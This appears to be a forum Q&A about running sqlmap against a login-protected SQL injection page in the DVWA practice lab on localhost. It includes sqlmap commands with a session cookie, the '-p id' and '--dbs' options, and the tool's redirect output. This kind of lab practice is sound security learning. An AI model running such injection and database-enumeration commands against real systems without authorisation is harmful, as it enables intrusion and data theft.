How to test post login pages for sql injection using sqlmap

Question

I have an application in which post login a page is vulnerable to SQL injection. Post login from the browser I captured the request via burp of that vulnerable page and fed the data to sqlmap. But I'm getting the following error.

[15:45:24] [INFO] testing connection to the target URL sqlmap got a 302 redirect to 'http://localhost:80/dvwa/login.php'. Do you want to follow? [Y/n] Y

[8]+ Stopped sqlmap -u http://localhost/dvwa/vulnerabilities/sqli/?id=2

This is the data I entered

sqlmap -u http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit --cookie="security=low; PHPSESSID=loif1hgpc539lith3rvbe1coh1" --dbs

Kindly advise hot to fix this.

.

score 0 · Accepted Answer · answered Jan 28 '19 at 01:41

0

I believe you would need to submit the query with the parameter id

This might help you: sqlmap -u http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit --cookie="security=low; PHPSESSID=loif1hgpc539lith3rvbe1coh1" -p id --dbs

answered Jan 28 '19 at 01:41

Jiger Jain

48
8

How to test post login pages for sql injection using sqlmap

1 Answers1